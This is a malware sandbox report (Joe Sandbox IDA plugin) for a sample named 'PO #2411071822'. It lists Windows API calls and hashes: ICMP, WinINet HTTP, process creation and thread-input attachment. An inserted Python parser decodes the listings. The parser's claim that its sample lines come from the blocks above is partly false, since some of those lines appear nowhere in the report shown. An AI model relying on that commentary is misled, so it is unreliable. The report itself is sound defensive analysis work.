• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: e381d8c11108f8047fd0ec399e5c901f8cbb96be6fb54b834e1ac80a7836b219
• Instruction ID: 35d5c6db663ce03b14d5ee05fbe33567e3c423bd194bbbcc9e0f8a70ab23b21e
• Opcode Fuzzy Hash: e381d8c11108f8047fd0ec399e5c901f8cbb96be6fb54b834e1ac80a7836b219
• Instruction Fuzzy Hash: BE518E31A047009FDB219F25DC45B6BBBE4AF48310F04896EFA55DB2E1DB78E901CB4A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0042E396
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0042E40C
• GetLastError.KERNEL32 ref: 0042E416
• SetErrorMode.KERNEL32(00000000,READY), ref: 0042E483
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 6546f08510a004205b215da2cb9fb7726521ca53aa64a57b9a7ef358393ce1a2
• Instruction ID: dc0fbe1869d3c05ac75e38a262c36182428cec56a7933a75047c5e76f534cae0
• Opcode Fuzzy Hash: 6546f08510a004205b215da2cb9fb7726521ca53aa64a57b9a7ef358393ce1a2
• Instruction Fuzzy Hash: 5331B435B002199FCB01EF65EC45FAE7BB4EF49304F548027E505EB291DB78AA02CB55
APIs
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0041B98C
• GetDlgCtrlID.USER32 ref: 0041B997
• GetParent.USER32 ref: 0041B9B3
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0041B9B6
• GetDlgCtrlID.USER32(?), ref: 0041B9BF
• GetParent.USER32(?), ref: 0041B9DB
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0041B9DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: 083cf33a3a6ea93cc6a369d3287f6628038f2aec8942be55ed01ecb1d93834c4
• Instruction ID: b5734f57bbfe11165bf899732aedb50ed6487f7ef66ec26a9372f0e9bf05859e
• Opcode Fuzzy Hash: 083cf33a3a6ea93cc6a369d3287f6628038f2aec8942be55ed01ecb1d93834c4
• Instruction Fuzzy Hash: 6321C1B4E00104BFCF05ABA5CC86EFEBB75EF49300B10012AF651972E1DBB95856DB69
APIs
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0041BA73
• GetDlgCtrlID.USER32 ref: 0041BA7E
• GetParent.USER32 ref: 0041BA9A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0041BA9D
• GetDlgCtrlID.USER32(?), ref: 0041BAA6
• GetParent.USER32(?), ref: 0041BAC2
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0041BAC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: b8566b99844416af3a77f10f1e44a02e0d76a3b2e89b4c24af7974794d045b6b
• Instruction ID: 035c900ecb94d3b0927e930ebe94fd9a5640964468c068b11919d54a47a93b24
• Opcode Fuzzy Hash: b8566b99844416af3a77f10f1e44a02e0d76a3b2e89b4c24af7974794d045b6b
• Instruction Fuzzy Hash: 142103B0E00104BFCF01AB65CC81EFEBB79EF44300F100116F551972A1EBB95856DB69
APIs
• GetParent.USER32 ref: 0041BAE3
• GetClassNameW.USER32(00000000,?,00000100), ref: 0041BAF8
• _wcscmp.LIBCMT ref: 0041BB0A
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0041BB85
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: cfa2b9a05bace319f656fc0128bb0cd5f0f0f60115f18bf55490a1d7367ae09e
• Instruction ID: fad6ba9769015deaf0b52115062b2f89b8f42ddcf0ecfba6001270c0953e595c
• Opcode Fuzzy Hash: cfa2b9a05bace319f656fc0128bb0cd5f0f0f60115f18bf55490a1d7367ae09e
• Instruction Fuzzy Hash: 4811C1B6A4C303F9FA247621DC06EE63B98DB11324F200037F904E58E5FBED6891559D
APIs
• VariantInit.OLEAUT32(?), ref: 0043B2D5
• CoInitialize.OLE32(00000000), ref: 0043B302
• CoUninitialize.OLE32 ref: 0043B30C
• GetRunningObjectTable.OLE32(00000000,?), ref: 0043B40C
• SetErrorMode.KERNEL32(00000001,00000029), ref: 0043B539
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0043B56D
• CoGetObject.OLE32(?,00000000,0046D91C,?), ref: 0043B590
• SetErrorMode.KERNEL32(00000000), ref: 0043B5A3
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0043B623
• VariantClear.OLEAUT32(0046D91C), ref: 0043B633
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: 5889a40948a83698f052dc6196daee6d3bc0aac946c9c2e448b6062ef4c76a07
• Instruction ID: a76a0f5af902487de0503745e609481afc53709cda217b75f5c5768440e61d77
• Opcode Fuzzy Hash: 5889a40948a83698f052dc6196daee6d3bc0aac946c9c2e448b6062ef4c76a07
• Instruction Fuzzy Hash: 9AC11471608305AFC700DF65C884A6BB7E9FF88308F00491EFA8A9B251DB75ED05CB96
APIs
• __lock.LIBCMT ref: 0040ACC1
  • Part of subcall function 00407CF4: __mtinitlocknum.LIBCMT ref: 00407D06
  • Part of subcall function 00407CF4: EnterCriticalSection.KERNEL32(00000000,?,00407ADD,0000000D), ref: 00407D1F
• __calloc_crt.LIBCMT ref: 0040ACD2
  • Part of subcall function 00406986: __calloc_impl.LIBCMT ref: 00406995
  • Part of subcall function 00406986: Sleep.KERNEL32(00000000,000003BC,003FF507,?,0000000E), ref: 004069AC
• @_EH4_CallFilterFunc@8.LIBCMT ref: 0040ACED
• GetStartupInfoW.KERNEL32(?,00496E28,00000064,00405E91,00496C70,00000014), ref: 0040AD46
• __calloc_crt.LIBCMT ref: 0040AD91
• GetFileType.KERNEL32(00000001), ref: 0040ADD8
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0040AE11
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
• String ID:
• API String ID: 1426640281-0
• Opcode ID: 5596281925ac789c494c2d5d497d8a4c1644cbd08fc1b611faa81040e9484d30
• Instruction ID: d9c39c5715d7fa7fe4950bd5bc90255f9fd3b73747b29e130f9afd3c2f57da4a
• Opcode Fuzzy Hash: 5596281925ac789c494c2d5d497d8a4c1644cbd08fc1b611faa81040e9484d30
• Instruction Fuzzy Hash: 6981C3B1D053458FDB14CF68C8445AABBF0AF46324B24427ED4A6BB3D1D7389853CB9A
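The function blocks above list each call as "Func.MODULE(args), ref: ADDR", with "?" for arguments the sandbox could not recover statically, occasional string arguments (the READY in SetErrorMode.KERNEL32(00000000,READY)), and indented "Part of subcall function" lines for callees. Reading the constants by hand is slow, so here is an added Python example (not part of the Joe Sandbox report) that parses lines in that shape into records and decodes the constants an analyst would otherwise look up: the Winsock version word passed to WSAStartup, the IcmpSendEcho timeout, the SetErrorMode flags, and the window-message IDs passed to SendMessageW. The sample input is constructed from lines copied out of the blocks above (the ICMP ping function, the drive-status function, the two ListBox/ComboBox functions and the CRT initialisation block); the constant tables are the documented Win32 values (WM_COMMAND 0x0111, LB_SETCURSEL 0x0186, LB_SELECTSTRING 0x018C, SEM_* flags). Because the report's argument order is the sandbox's stack reconstruction rather than the documented prototype order (compare the SendMessageW listings at 0041B9B6 and 0041B9DE, where 0x111 appears in different positions), message IDs are matched by value anywhere in the argument list, not by position.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: call lines copied from the report blocks above. The
# constants are the report's; nothing about the sample is invented.
SAMPLE = """\
• WSAStartup.WSOCK32(00000101,?), ref: 00438168
• gethostbyname.WSOCK32(?), ref: 004381B9
• IcmpCreateFile.IPHLPAPI ref: 004381C7
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00438237
• SetErrorMode.KERNEL32(00000001), ref: 0042E396
• SetErrorMode.KERNEL32(00000000,READY), ref: 0042E483
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0041B98C
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0041B9B6
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0041BA73
  • Part of subcall function 00407CF4: EnterCriticalSection.KERNEL32(00000000,?,00407ADD,0000000D), ref: 00407D1F
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Func.MODULE, an optional "(args)" group, and the "ref: ADDR" call site.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<func>[\w@?]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented Win32 constants used for decoding (values, not positions).
WINDOW_MESSAGES = {0x0111: "WM_COMMAND", 0x0186: "LB_SETCURSEL", 0x018C: "LB_SELECTSTRING"}
ERROR_MODE_FLAGS = {0x0001: "SEM_FAILCRITICALERRORS", 0x0002: "SEM_NOGPFAULTERRORBOX",
                    0x0004: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: list                       # int for a hex constant, None for '?', str for a named value
    ref: int                         # address of the call site
    subcall_of: Optional[int] = None  # set for 'Part of subcall function' lines


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                  # not recoverable statically by the sandbox
    try:
        return int(tok, 16)
    except ValueError:
        return tok                   # the report sometimes names a string argument, e.g. READY


def parse_api_listing(text: str) -> list[ApiCall]:
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                 # section headers such as 'APIs' or 'Strings' are skipped
        raw = m.group("args")
        args = [_parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            func=m.group("func"), module=m.group("mod"), args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def annotate(call: ApiCall) -> list[str]:
    """Decode the constants of one call into human-readable notes."""
    consts = [a for a in call.args if isinstance(a, int)]
    notes: list[str] = []
    if call.func == "SendMessageW":
        # Match known message IDs by value: the listing's argument order is a
        # stack reconstruction and does not always follow the prototype.
        notes += [WINDOW_MESSAGES[c] for c in consts if c in WINDOW_MESSAGES]
    elif call.func == "IcmpSendEcho" and len(call.args) == 8 and isinstance(call.args[7], int):
        notes.append(f"timeout={call.args[7]} ms")        # last parameter is Timeout in ms
    elif call.func == "WSAStartup" and consts:
        v = consts[0]                                       # MAKEWORD(major, minor)
        notes.append(f"winsock {v & 0xFF}.{v >> 8}")
    elif call.func == "SetErrorMode" and consts:
        flags = [name for bit, name in ERROR_MODE_FLAGS.items() if consts[0] & bit]
        notes.append("|".join(flags) if flags else "default error mode (0)")
    return notes


def module_histogram(calls: list[ApiCall]) -> dict[str, int]:
    """How many listed calls go to each import module."""
    return dict(Counter(c.module for c in calls))


if __name__ == "__main__":
    for c in parse_api_listing(SAMPLE):
        prefix = f"  (via {c.subcall_of:08X}) " if c.subcall_of else "  "
        print(f"{prefix}{c.ref:08X} {c.module}!{c.func} {annotate(c)}")
    print(module_histogram(parse_api_listing(SAMPLE)))
```

Run against the sample, the decoder reports WSAStartup requesting Winsock 1.1, IcmpSendEcho with a 4000 ms timeout (0xFA0), SetErrorMode(1) as SEM_FAILCRITICALERRORS (the call that keeps GetDiskFreeSpaceW from popping a "drive not ready" dialog before the function returns one of INVALID/NOTREADY/READONLY/READY/UNKNOWN), and the three SendMessageW sites as LB_SELECTSTRING, WM_COMMAND and LB_SETCURSEL. The ReplySize of 0x29 (41) in the IcmpSendEcho calls is the documented minimum of sizeof(ICMP_ECHO_REPLY) plus the 5-byte request plus 8 bytes of ICMP error space on a 32-bit build, which is consistent with a stock runtime ping helper rather than anything hand-rolled.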
APIs
• GetCurrentThreadId.KERNEL32 ref: 00424047
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,004230A5,?,00000001), ref: 0042405B
• GetWindowThreadProcessId.USER32(00000000), ref: 00424062
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004230A5,?,00000001), ref: 00424071
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00424083
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004230A5,?,00000001), ref: 0042409C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004230A5,?,00000001), ref: 004240AE
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004230A5,?,00000001), ref: 004240F3
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004230A5,?,00000001), ref: 00424108
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004230A5,?,00000001), ref: 00424113
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• GetSysColor.USER32(00000008), ref: 003FB496
• SetTextColor.GDI32(?,000000FF), ref: 003FB4A0
• SetBkMode.GDI32(?,00000001), ref: 003FB4B5
• GetStockObject.GDI32(00000005), ref: 003FB4BD
• GetClientRect.USER32(?), ref: 0045DD63
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0045DD7A
• GetWindowDC.USER32(?), ref: 0045DD86
• GetPixel.GDI32(00000000,?,?), ref: 0045DD95
• ReleaseDC.USER32(?,00000000), ref: 0045DDA7
• GetSysColor.USER32(00000005), ref: 0045DDC5
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
• String ID:
• API String ID: 3430376129-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003E30DC
• CoUninitialize.OLE32(?,00000000), ref: 003E3181
• UnregisterHotKey.USER32(?), ref: 003E32A9
• DestroyWindow.USER32(?), ref: 00455079
• FreeLibrary.KERNEL32(?), ref: 004550F8
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00455125
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 003FCC15
  • Part of subcall function 003FCCCD: GetClientRect.USER32(?,?), ref: 003FCCF6
  • Part of subcall function 003FCCCD: GetWindowRect.USER32(?,?), ref: 003FCD37
  • Part of subcall function 003FCCCD: ScreenToClient.USER32(?,?), ref: 003FCD5F
• GetDC.USER32 ref: 0045D137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0045D14A
• SelectObject.GDI32(00000000,00000000), ref: 0045D158
• SelectObject.GDI32(00000000,00000000), ref: 0045D16D
• ReleaseDC.USER32(?,00000000), ref: 0045D175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0045D200
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
  • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
  • Part of subcall function 003FB63C: GetCursorPos.USER32(000000FF), ref: 003FB64F
  • Part of subcall function 003FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 003FB66C
  • Part of subcall function 003FB63C: GetAsyncKeyState.USER32(00000001), ref: 003FB691
  • Part of subcall function 003FB63C: GetAsyncKeyState.USER32(00000002), ref: 003FB69F
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0044ED3C
• ImageList_EndDrag.COMCTL32 ref: 0044ED42
• ReleaseCapture.USER32 ref: 0044ED48
• SetWindowTextW.USER32(?,00000000), ref: 0044EDF0
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0044EE03
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0044EEDC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004345FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0043462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0043466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00434682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0043468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004346BF
• InternetCloseHandle.WININET(00000000), ref: 00434706
  • Part of subcall function 00435052: GetLastError.KERNEL32(?,?,004343CC,00000000,00000000,00000001), ref: 00435067
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0047DC00), ref: 0043B715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0047DC00), ref: 0043B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0043B8C1
• SysFreeString.OLEAUT32(?), ref: 0043B8EB
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 004424F5
                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00442688
                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004426AC
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004426EC
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0044270E
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0044286F
                                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004428A1
                                                                                                              • CloseHandle.KERNEL32(?), ref: 004428D0
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00442947
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4090791747-0
                                                                                                              • Opcode ID: 335c1c5d926ec012c5a1403d88f73e7eb5d22cc351b5fbe7a6493846d826b170
                                                                                                              • Instruction ID: a8096d95d7b1c9fd88b2a00e388ef1b1d868255f8b2d350b873f4025ae048450
                                                                                                              • Opcode Fuzzy Hash: 335c1c5d926ec012c5a1403d88f73e7eb5d22cc351b5fbe7a6493846d826b170
                                                                                                              • Instruction Fuzzy Hash: C4D1CD31604200DFD715EF25C991B6EBBE0AF84314F18896EF9899B3A2DB74DC41CB5A
                                                                                                              APIs
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0044B3F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InvalidateRect
                                                                                                              • String ID:
                                                                                                              • API String ID: 634782764-0
                                                                                                              • Opcode ID: 0e1afc1d9d3fba2ca507d1738548bffe5370c4024a03918b8546f0f39010e953
                                                                                                              • Instruction ID: 407442b10a134d5153b4e8519192ee138da205833c0400e8b2b8b3764ced5a42
                                                                                                              • Opcode Fuzzy Hash: 0e1afc1d9d3fba2ca507d1738548bffe5370c4024a03918b8546f0f39010e953
                                                                                                              • Instruction Fuzzy Hash: 6551C770A00204BFFF249F25CC85BAE7BA4EB05718F644117FA15D62E1D779E9408BD9
                                                                                                              APIs
                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0045DB1B
                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0045DB3C
                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0045DB51
                                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0045DB6E
                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0045DB95
                                                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,003FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0045DBA0
                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0045DBBD
                                                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,003FA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0045DBC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                               • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
